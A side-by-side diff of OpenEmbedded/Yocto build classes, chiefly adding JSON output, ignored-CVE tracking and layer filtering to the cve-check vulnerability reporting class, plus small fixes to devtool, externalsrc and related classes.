126 if d.getVar("CVE_CHECK_COPY_FILES") == "1": 183 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
127 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE") 184 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
128 if os.path.exists(deploy_file): 185 if os.path.exists(deploy_file):
129 bb.utils.remove(deploy_file) 186 bb.utils.remove(deploy_file)
130 187 deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
131 if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")): 188 if os.path.exists(deploy_file_json):
132 bb.note("Writing rootfs CVE manifest") 189 bb.utils.remove(deploy_file_json)
133 deploy_dir = d.getVar("DEPLOY_DIR_IMAGE") 190
134 link_name = d.getVar("IMAGE_LINK_NAME") 191 # Create a list of relevant recipies
192 recipies = set()
193 for pkg in list(image_list_installed_packages(d)):
194 pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
195 'runtime-reverse', pkg)
196 pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
197 recipies.add(pkg_data["PN"])
198
199 bb.note("Writing rootfs CVE manifest")
200 deploy_dir = d.getVar("IMGDEPLOYDIR")
201 link_name = d.getVar("IMAGE_LINK_NAME")
202
203 json_data = {"version":"1", "package": []}
204 text_data = ""
205 enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
206 enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
207
208 save_pn = d.getVar("PN")
209
210 for pkg in recipies:
211 # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
212 # it with the different PN names set each time.
213 d.setVar("PN", pkg)
214 if enable_text:
215 pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
216 if os.path.exists(pkgfilepath):
217 with open(pkgfilepath) as pfile:
218 text_data += pfile.read()
219
220 if enable_json:
221 pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
222 if os.path.exists(pkgfilepath):
223 with open(pkgfilepath) as j:
224 data = json.load(j)
225 cve_check_merge_jsons(json_data, data)
226
227 d.setVar("PN", save_pn)
228
229 if enable_text:
230 link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
135 manifest_name = d.getVar("CVE_CHECK_MANIFEST") 231 manifest_name = d.getVar("CVE_CHECK_MANIFEST")
136 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
137
138 shutil.copyfile(cve_tmp_file, manifest_name)
139 232
140 if manifest_name and os.path.exists(manifest_name): 233 with open(manifest_name, "w") as f:
141 manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name) 234 f.write(text_data)
142 # If we already have another manifest, update symlinks
143 if os.path.exists(os.path.realpath(manifest_link)):
144 os.remove(manifest_link)
145 os.symlink(os.path.basename(manifest_name), manifest_link)
146 bb.plain("Image CVE report stored in: %s" % manifest_name)
147}
148
149ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
150do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
151 235
152def get_patches_cves(d): 236 update_symlinks(manifest_name, link_path)
153 """ 237 bb.plain("Image CVE report stored in: %s" % manifest_name)
154 Get patches that solve CVEs using the "CVE: " tag.
155 """
156 238
157 import re 239 if enable_json:
240 link_path = os.path.join(deploy_dir, "%s.json" % link_name)
241 manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
158 242
159 pn = d.getVar("PN") 243 with open(manifest_name, "w") as f:
160 cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+") 244 json.dump(json_data, f, indent=2)
161
162 # Matches last CVE-1234-211432 in the file name, also if written
163 # with small letters. Not supporting multiple CVE id's in a single
164 # file name.
165 cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
166
167 patched_cves = set()
168 bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
169 for url in src_patches(d):
170 patch_file = bb.fetch.decodeurl(url)[2]
171
172 if not os.path.isfile(patch_file):
173 bb.error("File Not found: %s" % patch_file)
174 raise FileNotFoundError
175
176 # Check patch file name for CVE ID
177 fname_match = cve_file_name_match.search(patch_file)
178 if fname_match:
179 cve = fname_match.group(1).upper()
180 patched_cves.add(cve)
181 bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
182
183 with open(patch_file, "r", encoding="utf-8") as f:
184 try:
185 patch_text = f.read()
186 except UnicodeDecodeError:
187 bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
188 " trying with iso8859-1" % patch_file)
189 f.close()
190 with open(patch_file, "r", encoding="iso8859-1") as f:
191 patch_text = f.read()
192
193 # Search for one or more "CVE: " lines
194 text_match = False
195 for match in cve_match.finditer(patch_text):
196 # Get only the CVEs without the "CVE: " tag
197 cves = patch_text[match.start()+5:match.end()]
198 for cve in cves.split():
199 bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
200 patched_cves.add(cve)
201 text_match = True
202 245
203 if not fname_match and not text_match: 246 update_symlinks(manifest_name, link_path)
204 bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file) 247 bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
248}
205 249
206 return patched_cves 250ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
251do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
252do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
207 253
208def check_cves(d, patched_cves): 254def check_cves(d, patched_cves):
209 """ 255 """
210 Connect to the NVD database and find unpatched cves. 256 Connect to the NVD database and find unpatched cves.
211 """ 257 """
212 from oe.cve_check import Version 258 from oe.cve_check import Version, convert_cve_version
213 259
214 pn = d.getVar("PN") 260 pn = d.getVar("PN")
215 real_pv = d.getVar("PV") 261 real_pv = d.getVar("PV")
216 suffix = d.getVar("CVE_VERSION_SUFFIX") 262 suffix = d.getVar("CVE_VERSION_SUFFIX")
217 263
218 cves_unpatched = [] 264 cves_unpatched = []
265 cves_ignored = []
266 cves_status = []
267 cves_in_recipe = False
219 # CVE_PRODUCT can contain more than one product (eg. curl/libcurl) 268 # CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
220 products = d.getVar("CVE_PRODUCT").split() 269 products = d.getVar("CVE_PRODUCT").split()
221 # If this has been unset then we're not scanning for CVEs here (for example, image recipes) 270 # If this has been unset then we're not scanning for CVEs here (for example, image recipes)
222 if not products: 271 if not products:
223 return ([], [], []) 272 return ([], [], [], [])
224 pv = d.getVar("CVE_VERSION").split("+git")[0] 273 pv = d.getVar("CVE_VERSION").split("+git")[0]
225 274
226 # If the recipe has been whitlisted we return empty lists 275 # If the recipe has been whitelisted we return empty lists
227 if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split(): 276 if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
228 bb.note("Recipe has been whitelisted, skipping check") 277 bb.note("Recipe has been whitelisted, skipping check")
229 return ([], [], []) 278 return ([], [], [], [])
230 279
231 old_cve_whitelist = d.getVar("CVE_CHECK_CVE_WHITELIST")
232 if old_cve_whitelist:
233 bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
234 cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split() 280 cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
235 281
236 import sqlite3 282 import sqlite3
@@ -239,28 +285,42 @@ def check_cves(d, patched_cves):
239 285
240 # For each of the known product names (e.g. curl has CPEs using curl and libcurl)... 286 # For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
241 for product in products: 287 for product in products:
288 cves_in_product = False
242 if ":" in product: 289 if ":" in product:
243 vendor, product = product.split(":", 1) 290 vendor, product = product.split(":", 1)
244 else: 291 else:
245 vendor = "%" 292 vendor = "%"
246 293
247 # Find all relevant CVE IDs. 294 # Find all relevant CVE IDs.
248 for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)): 295 cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
296 for cverow in cve_cursor:
249 cve = cverow[0] 297 cve = cverow[0]
250 298
251 if cve in cve_whitelist: 299 if cve in cve_whitelist:
252 bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve)) 300 bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
253 # TODO: this should be in the report as 'whitelisted' 301 cves_ignored.append(cve)
254 patched_cves.add(cve)
255 continue 302 continue
256 elif cve in patched_cves: 303 elif cve in patched_cves:
257 bb.note("%s has been patched" % (cve)) 304 bb.note("%s has been patched" % (cve))
258 continue 305 continue
306 # Write status once only for each product
307 if not cves_in_product:
308 cves_status.append([product, True])
309 cves_in_product = True
310 cves_in_recipe = True
259 311
260 vulnerable = False 312 vulnerable = False
261 for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)): 313 ignored = False
314
315 product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
316 for row in product_cursor:
262 (_, _, _, version_start, operator_start, version_end, operator_end) = row 317 (_, _, _, version_start, operator_start, version_end, operator_end) = row
263 #bb.debug(2, "Evaluating row " + str(row)) 318 #bb.debug(2, "Evaluating row " + str(row))
319 if cve in cve_whitelist:
320 ignored = True
321
322 version_start = convert_cve_version(version_start)
323 version_end = convert_cve_version(version_end)
264 324
265 if (operator_start == '=' and pv == version_start) or version_start == '-': 325 if (operator_start == '=' and pv == version_start) or version_start == '-':
266 vulnerable = True 326 vulnerable = True
@@ -293,18 +353,27 @@ def check_cves(d, patched_cves):
293 vulnerable = vulnerable_start or vulnerable_end 353 vulnerable = vulnerable_start or vulnerable_end
294 354
295 if vulnerable: 355 if vulnerable:
296 bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve)) 356 if ignored:
297 cves_unpatched.append(cve) 357 bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
358 cves_ignored.append(cve)
359 else:
360 bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
361 cves_unpatched.append(cve)
298 break 362 break
363 product_cursor.close()
299 364
300 if not vulnerable: 365 if not vulnerable:
301 bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve)) 366 bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
302 # TODO: not patched but not vulnerable
303 patched_cves.add(cve) 367 patched_cves.add(cve)
368 cve_cursor.close()
369
370 if not cves_in_product:
371 bb.note("No CVE records found for product %s, pn %s" % (product, pn))
372 cves_status.append([product, False])
304 373
305 conn.close() 374 conn.close()
306 375
307 return (list(cve_whitelist), list(patched_cves), cves_unpatched) 376 return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
308 377
309def get_cve_info(d, cves): 378def get_cve_info(d, cves):
310 """ 379 """
@@ -314,21 +383,23 @@ def get_cve_info(d, cves):
314 import sqlite3 383 import sqlite3
315 384
316 cve_data = {} 385 cve_data = {}
317 conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE")) 386 db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
387 conn = sqlite3.connect(db_file, uri=True)
318 388
319 for cve in cves: 389 for cve in cves:
320 for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)): 390 cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
391 for row in cursor:
321 cve_data[row[0]] = {} 392 cve_data[row[0]] = {}
322 cve_data[row[0]]["summary"] = row[1] 393 cve_data[row[0]]["summary"] = row[1]
323 cve_data[row[0]]["scorev2"] = row[2] 394 cve_data[row[0]]["scorev2"] = row[2]
324 cve_data[row[0]]["scorev3"] = row[3] 395 cve_data[row[0]]["scorev3"] = row[3]
325 cve_data[row[0]]["modified"] = row[4] 396 cve_data[row[0]]["modified"] = row[4]
326 cve_data[row[0]]["vector"] = row[5] 397 cve_data[row[0]]["vector"] = row[5]
327 398 cursor.close()
328 conn.close() 399 conn.close()
329 return cve_data 400 return cve_data
330 401
331def cve_write_data(d, patched, unpatched, whitelisted, cve_data): 402def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
332 """ 403 """
333 Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and 404 Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and
334 CVE manifest if enabled. 405 CVE manifest if enabled.
@@ -338,20 +409,38 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
338 fdir_name = d.getVar("FILE_DIRNAME") 409 fdir_name = d.getVar("FILE_DIRNAME")
339 layer = fdir_name.split("/")[-3] 410 layer = fdir_name.split("/")[-3]
340 411
341 nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId=" 412 include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
413 exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
414
415 report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
416
417 if exclude_layers and layer in exclude_layers:
418 return
419
420 if include_layers and layer not in include_layers:
421 return
422
423 # Early exit, the text format does not report packages without CVEs
424 if not patched+unpatched+whitelisted:
425 return
426
427 nvd_link = "https://nvd.nist.gov/vuln/detail/"
342 write_string = "" 428 write_string = ""
343 unpatched_cves = [] 429 unpatched_cves = []
344 bb.utils.mkdirhier(os.path.dirname(cve_file)) 430 bb.utils.mkdirhier(os.path.dirname(cve_file))
345 431
346 for cve in sorted(cve_data): 432 for cve in sorted(cve_data):
347 is_patched = cve in patched 433 is_patched = cve in patched
348 if is_patched and (d.getVar("CVE_CHECK_REPORT_PATCHED") != "1"): 434 is_ignored = cve in whitelisted
435
436 if (is_patched or is_ignored) and not report_all:
349 continue 437 continue
438
350 write_string += "LAYER: %s\n" % layer 439 write_string += "LAYER: %s\n" % layer
351 write_string += "PACKAGE NAME: %s\n" % d.getVar("PN") 440 write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
352 write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV")) 441 write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
353 write_string += "CVE: %s\n" % cve 442 write_string += "CVE: %s\n" % cve
354 if cve in whitelisted: 443 if is_ignored:
355 write_string += "CVE STATUS: Whitelisted\n" 444 write_string += "CVE STATUS: Whitelisted\n"
356 elif is_patched: 445 elif is_patched:
357 write_string += "CVE STATUS: Patched\n" 446 write_string += "CVE STATUS: Patched\n"
@@ -364,23 +453,138 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
364 write_string += "VECTOR: %s\n" % cve_data[cve]["vector"] 453 write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
365 write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve) 454 write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
366 455
367 if unpatched_cves: 456 if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
368 bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file)) 457 bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
369 458
370 if write_string: 459 with open(cve_file, "w") as f:
371 with open(cve_file, "w") as f: 460 bb.note("Writing file %s with CVE information" % cve_file)
372 bb.note("Writing file %s with CVE information" % cve_file) 461 f.write(write_string)
462
463 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
464 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
465 bb.utils.mkdirhier(os.path.dirname(deploy_file))
466 with open(deploy_file, "w") as f:
467 f.write(write_string)
468
469 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
470 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
471 bb.utils.mkdirhier(cvelogpath)
472
473 with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
474 f.write("%s" % write_string)
475
476def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
477 """
478 Write CVE information in the JSON format: to WORKDIR; and to
479 CVE_CHECK_DIR, if CVE manifest if enabled, write fragment
480 files that will be assembled at the end in cve_check_write_rootfs_manifest.
481 """
482
483 import json
484
485 write_string = json.dumps(output, indent=2)
486 with open(direct_file, "w") as f:
487 bb.note("Writing file %s with CVE information" % direct_file)
488 f.write(write_string)
489
490 if d.getVar("CVE_CHECK_COPY_FILES") == "1":
491 bb.utils.mkdirhier(os.path.dirname(deploy_file))
492 with open(deploy_file, "w") as f:
493 f.write(write_string)
494
495 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
496 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
497 index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
498 bb.utils.mkdirhier(cvelogpath)
499 fragment_file = os.path.basename(deploy_file)
500 fragment_path = os.path.join(cvelogpath, fragment_file)
501 with open(fragment_path, "w") as f:
373 f.write(write_string) 502 f.write(write_string)
503 with open(index_path, "a+") as f:
504 f.write("%s\n" % fragment_path)
505
506def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
507 """
508 Prepare CVE data for the JSON format, then write it.
509 """
510
511 output = {"version":"1", "package": []}
512 nvd_link = "https://nvd.nist.gov/vuln/detail/"
513
514 fdir_name = d.getVar("FILE_DIRNAME")
515 layer = fdir_name.split("/")[-3]
516
517 include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
518 exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
519
520 report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
521
522 if exclude_layers and layer in exclude_layers:
523 return
524
525 if include_layers and layer not in include_layers:
526 return
527
528 unpatched_cves = []
529
530 product_data = []
531 for s in cve_status:
532 p = {"product": s[0], "cvesInRecord": "Yes"}
533 if s[1] == False:
534 p["cvesInRecord"] = "No"
535 product_data.append(p)
536
537 package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
538 package_data = {
539 "name" : d.getVar("PN"),
540 "layer" : layer,
541 "version" : package_version,
542 "products": product_data
543 }
544 cve_list = []
545
546 for cve in sorted(cve_data):
547 is_patched = cve in patched
548 is_ignored = cve in ignored
549 status = "Unpatched"
550 if (is_patched or is_ignored) and not report_all:
551 continue
552 if is_ignored:
553 status = "Ignored"
554 elif is_patched:
555 status = "Patched"
556 else:
557 # default value of status is Unpatched
558 unpatched_cves.append(cve)
559
560 issue_link = "%s%s" % (nvd_link, cve)
374 561
375 if d.getVar("CVE_CHECK_COPY_FILES") == "1": 562 cve_item = {
376 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE") 563 "id" : cve,
377 bb.utils.mkdirhier(os.path.dirname(deploy_file)) 564 "summary" : cve_data[cve]["summary"],
378 with open(deploy_file, "w") as f: 565 "scorev2" : cve_data[cve]["scorev2"],
379 f.write(write_string) 566 "scorev3" : cve_data[cve]["scorev3"],
567 "vector" : cve_data[cve]["vector"],
568 "status" : status,
569 "link": issue_link
570 }
571 cve_list.append(cve_item)
380 572
381 if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1": 573 package_data["issue"] = cve_list
382 cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR") 574 output["package"].append(package_data)
383 bb.utils.mkdirhier(cvelogpath) 575
576 direct_file = d.getVar("CVE_CHECK_LOG_JSON")
577 deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
578 manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
579
580 cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
581
582def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
583 """
584 Write CVE data in each enabled format.
585 """
384 586
385 with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f: 587 if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
386 f.write("%s" % write_string) 588 cve_write_data_text(d, patched, unpatched, ignored, cve_data)
589 if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
590 cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
128 more = i.runsource(source, "<pyshell>") 128 more = i.runsource(source, "<pyshell>")
129 if not more: 129 if not more:
130 buf = [] 130 buf = []
131 sys.stderr.flush()
131 prompt(more) 132 prompt(more)
132 except KeyboardInterrupt: 133 except KeyboardInterrupt:
133 i.write("\nKeyboardInterrupt\n") 134 i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
199 # Run do_patch function with the override applied 199 # Run do_patch function with the override applied
200 localdata = bb.data.createCopy(d) 200 localdata = bb.data.createCopy(d)
201 localdata.setVar('OVERRIDES', ':'.join(no_overrides)) 201 localdata.setVar('OVERRIDES', ':'.join(no_overrides))
202 localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
202 bb.build.exec_func('do_patch', localdata) 203 bb.build.exec_func('do_patch', localdata)
203 rm_patches() 204 rm_patches()
204 # Now we need to reconcile the dev branch with the no-overrides one 205 # Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
216 # Reset back to the initial commit on a new branch 217 # Reset back to the initial commit on a new branch
217 bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir) 218 bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
218 # Run do_patch function with the override applied 219 # Run do_patch function with the override applied
219 localdata.appendVar('OVERRIDES', ':%s' % override) 220 localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
221 localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
220 bb.build.exec_func('do_patch', localdata) 222 bb.build.exec_func('do_patch', localdata)
221 rm_patches() 223 rm_patches()
222 # Now we need to reconcile the new branch with the no-overrides one 224 # Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
4# 4#
5# Usage: 5# Usage:
6# BBCLASSEXTEND = "devupstream:target" 6# BBCLASSEXTEND = "devupstream:target"
7# SRC_URI_class-devupstream = "git://git.example.com/example" 7# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
8# SRCREV_class-devupstream = "abcdef" 8# SRCREV_class-devupstream = "abcdef"
9# 9#
10# If the first entry in SRC_URI is a git: URL then S is rewritten to 10# If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index 1d7300d65b..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
60 if externalsrcbuild: 60 if externalsrcbuild:
61 d.setVar('B', externalsrcbuild) 61 d.setVar('B', externalsrcbuild)
62 else: 62 else:
63 d.setVar('B', '${WORKDIR}/${BPN}-${PV}/') 63 d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
64 64
65 local_srcuri = [] 65 local_srcuri = []
66 fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d) 66 fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
108 if local_srcuri and task in fetch_tasks: 108 if local_srcuri and task in fetch_tasks:
109 continue 109 continue
110 bb.build.deltask(task, d) 110 bb.build.deltask(task, d)
111 if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
112 # The reproducible_build's create_source_date_epoch_stamp function must
113 # be run after the source is available and before the
114 # do_deploy_source_date_epoch task. In the normal case, it's attached
115 # to do_unpack as a postfuncs, but since we removed do_unpack (above)
116 # we need to move the function elsewhere. The easiest thing to do is
117 # move it into the prefuncs of the do_deploy_source_date_epoch task.
118 # This is safe, as externalsrc runs with the source already unpacked.
119 d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
111 120
112 d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ") 121 d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
113 d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ") 122 d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -198,8 +207,8 @@ def srctree_hash_files(d, srcdir=None):
198 try: 207 try:
199 git_dir = os.path.join(s_dir, 208 git_dir = os.path.join(s_dir,
200 subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip()) 209 subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
201 top_git_dir = os.path.join(s_dir, subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], 210 top_git_dir = os.path.join(d.getVar("TOPDIR"),
202 stderr=subprocess.DEVNULL).decode("utf-8").rstrip()) 211 subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
203 if git_dir == top_git_dir: 212 if git_dir == top_git_dir:
204 git_dir = None 213 git_dir = None
205 except subprocess.CalledProcessError: 214 except subprocess.CalledProcessError:
@@ -216,14 +225,16 @@ def srctree_hash_files(d, srcdir=None):
216 env['GIT_INDEX_FILE'] = tmp_index.name 225 env['GIT_INDEX_FILE'] = tmp_index.name
217 subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env) 226 subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
218 git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8") 227 git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
219 submodule_helper = subprocess.check_output(['git', 'submodule--helper', 'list'], cwd=s_dir, env=env).decode("utf-8") 228 if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
220 for line in submodule_helper.splitlines(): 229 submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
221 module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1]) 230 for line in submodule_helper.splitlines():
222 proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 231 module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
223 proc.communicate() 232 if os.path.isdir(module_dir):
224 proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) 233 proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
225 stdout, _ = proc.communicate() 234 proc.communicate()
226 git_sha1 += stdout.decode("utf-8") 235 proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
236 stdout, _ = proc.communicate()
237 git_sha1 += stdout.decode("utf-8")
227 sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest() 238 sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
228 with open(oe_hash_file, 'w') as fobj: 239 with open(oe_hash_file, 'w') as fobj:
229 fobj.write(sha1) 240 fobj.write(sha1)
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
4def get_rootfs_uuid(d): 4def get_rootfs_uuid(d):
5 import subprocess 5 import subprocess
6 rootfs = d.getVar('ROOTFS') 6 rootfs = d.getVar('ROOTFS')
7 output = subprocess.check_output(['tune2fs', '-l', rootfs]) 7 output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
8 for line in output.split('\n'): 8 for line in output.split('\n'):
9 if line.startswith('Filesystem UUID:'): 9 if line.startswith('Filesystem UUID:'):
10 uuid = line.split()[-1] 10 uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index e6c3591479..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -118,7 +118,7 @@ go_do_install() {
